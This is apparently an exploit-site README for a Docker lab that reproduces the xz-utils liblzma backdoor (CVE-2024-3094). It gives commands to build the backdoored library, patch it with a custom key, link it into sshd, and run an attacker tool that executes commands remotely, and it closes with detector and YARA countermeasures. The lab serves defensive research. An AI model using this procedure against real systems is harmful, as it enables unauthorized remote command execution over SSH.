## https://sploitus.com/exploit?id=B25FC383-2015-523B-A1F7-8F5D7DC56D44
# ๐ก๏ธ Cybersecurity Project: Analyzing the XZ Backdoor in liblzma
## ๐ Overview
This project analyzes the high-profile backdoor discovered in **xz-utils (liblzma)**, affecting versions **5.6.0** and **5.6.1**. The malicious code introduced into the upstream build system targeted SSH authentication by modifying how `sshd` interacts with the LZMA compression library at runtime.
> โ ๏ธ This project is for **educational and defensive research** purposes only.
# Vulnerable machine
Clone this repository
git clone https://github.com/valeriot30/cve-2024-3094
Navigate to the directory
cd cve-2024-3094
Spawn the docker container
docker build -t fedora-dev .
docker run --privileged -it --rm -p 2222:22 fedora-dev
Get a malicious version of the library
cd ~
git clone https://github.com/thesamesam/xz-archive.git
cd xz-archive/5.6/ # The vulnerable version ( it works as well with 5.6.1 )
tar xzf xz-5.6.0.tar.gz
mv xz-5.6.0 ~
Export the build target
export RPM_ARCH=$(uname -m)
Compile the malicious library
cd ~
cd ./xz-5.6.0/
./configure
make -j 8
Copy the malicious SO outside:
cp ./src/liblzma/.libs/liblzma.so.5.6.0 ~
Clone again the repository inside the container
git clone https://github.com/valeriot30/cve-2024-3094
Patch the liblzma library with a custom key
python3 cve-2024-3094/patch.py liblzma.so.5.6.0
Link the malicious library in the system
sh cve-2024-3094/inject.sh
Run the sshd linked with the malicious library
env -i LANG=C /usr/sbin/sshd -D &
# Attacker machine
Clone this repository
git clone https://github.com/valeriot30/cve-2024-3094
Navigate to the directory
cd cve-2024-3094
Compile the GO Tool
go build
Use the tool by inserting vulnerable machine IP address and the command to execute
./bot -addr 127.0.0.2:2222 -cmd 'sleep 60'
# Counter-Measures
## Using the detector
Run the detector
sh detector.sh
## Using Yara
Use the yara matching rules
yara rule.yar ../liblzma.so.5.6.0 -s